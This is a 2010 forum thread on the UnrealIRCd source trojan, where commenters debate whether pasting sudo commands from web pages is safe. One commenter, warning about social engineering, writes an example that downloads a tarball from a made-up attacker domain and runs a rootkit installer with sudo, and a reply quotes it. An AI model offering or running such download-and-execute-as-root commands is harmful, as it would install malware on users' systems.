Linked by Jordan Spencer Cunningham on Mon 14th Jun 2010 23:58 UTC
Bugs & Viruses Recently, the Linux version of UnrealIRCd was discovered to have had a Trojan worm its way into the source code. Even more embarrassing for the developers of Unreal is that the Trojan's been holding open the backdoor in the source code since November of 2009-- not very recently. And, of course, bloggers and press in general are taking the opportunity of another breach in Linux security to point out doomsday devices that don't really exist.
Thread beginning with comment 430063
To view parent comment, click here.
To read all comments associated with this story, please click here.
RE[4]: Comment by lemur2
by lemur2 on Tue 15th Jun 2010 07:28 UTC in reply to "RE[3]: Comment by lemur2"
lemur2
Member since:
2007-02-17

"For example, if you want a version of Firefox-3.7 that includes WebM, right now, today, then here you go: https://launchpad.net/~ubuntu-mozilla-daily/+archive/ppa Open a terminal and enter: sudo add-apt-repository ppa:ubuntu-mozilla-daily/ppa sudo apt-get update sudo apt-get install firefox-3.7 This will install a GPG signed version of Mozilla 3.7 nightly build on your Ubuntu system, using the apt package manager, independent of Ubuntu's repositories. The end user does not have to know anything about GPG. The first command, add-apt-repository, gets a key for the ppa from a trusted keyserver.
No, but they'd have to know about sudo, apt-get, package managers, and key servers. Somehow, that doesn't seem a whole lot less complicated. "

Not at all. Users need to know only:
(1) How to "Open a terminal",
(2) How to highlight a line of text from this very web page as they are reading it,
(3) How to paste that copied text into the terminal application (hint: middle-click anywhere in the terminal window area)
(4) their password

They do that three times, once for each line (actually, they need to know their password only for the first line), and they are done.

It sin't hard. Select each line of text, one line at a time, in order, for the following three lines:
sudo add-apt-repository ppa:ubuntu-mozilla-daily/ppa
sudo apt-get update
sudo apt-get install firefox-3.7


Then middle-click anywhere in the terminal window after each selection has been made.

Users don't even need to know how to type (except for their password, once only).

There is also a GUI way to do the same thing using Synaptic, but that is actually harder to describe on a text-based web forum such as this, and harder for users to actually carry out.

Anyway, had the vendors of the app which is the subject of this thread simply opened a launchpad.net account and copied their source tree there, this trojan would have been avoided for Ubuntu/Kubuntu users.

Edited 2010-06-15 07:36 UTC

Reply Parent Score: 2

RE[5]: Comment by lemur2
by stew on Tue 15th Jun 2010 09:33 in reply to "RE[4]: Comment by lemur2"
stew Member since:
2005-07-06

Are you seriously suggesting that copy&pasting commands that one doesn't understand from some web site is a safe thing to do? If you're training users to just blindly type 'sudo' commands without understanding what they do, you're creating a large opportunity for social engineering:

To get the latest Firefox with instant Facebook updates, type these commands:
1. wget http://thehax0rzplaze.com/infectedFireFox.tgz
2. tar zxvf infectedFireFox.tgz
3. sudo infectedFireFox/installRootKit.sh
then type your password.

Edited 2010-06-15 09:35 UTC

Reply Parent Score: 9

RE[6]: Comment by lemur2
by lemur2 on Tue 15th Jun 2010 09:58 in reply to "RE[5]: Comment by lemur2"
lemur2 Member since:
2007-02-17

Are you seriously suggesting that copy&pasting commands that one doesn't understand from some web site is a safe thing to do? If you're training users to just blindly type 'sudo' commands without understanding what they do, you're creating a large opportunity for social engineering:

To get the latest Firefox with instant Facebook updates, type these commands:
1. wget http://thehax0rzplaze.com/infectedFireFox.tgz
2. tar zxvf infectedFireFox.tgz
3. sudo infectedFireFox/installRootKit.sh
then type your password.


Strangely enough, what you just described is the very means by which one had to install the UnrealIRCd trojan.

You do have a point. I would first caution uses to look for the keyword "signed" and "open source" on the source page.

Like this one has:
https://launchpad.net/~ubuntu-mozilla-daily/+archive/ppa

It says: "daily (or even multiple builds per day) for various mozilla projects and branches". Mozilla is open source.

It also says: "You can update your system with unsupported packages from this untrusted PPA by adding ppa:ubuntu-mozilla-daily/ppa to your system's Software Sources" so it warns you about what you are doing. There is no attempt at trickery of social engineering here, this is definitely a potential system-breaker thing to do.

The thing is, you can do it. You can participate in the cutting-edge development of Mozilla, via running, testing and reporting on the very latest build. Don't do this on anything other than a test system, however ... because, as it warns you, this is untrusted. Don't trust it on a system with anything important on it.

This is most decidedly a "user beware" operation. We are talking here about unstable nightly development builds, after all.

Edited 2010-06-15 10:03 UTC

Reply Parent Score: 2

jabbotts Member since:
2007-09-06

"Firefox can't find the server at www.thehax0rzplaze.com"


No Fair! It won't let me in!

(I kid, of course though i would have laughed pretty hard if the domain did exist)

Reply Parent Score: 2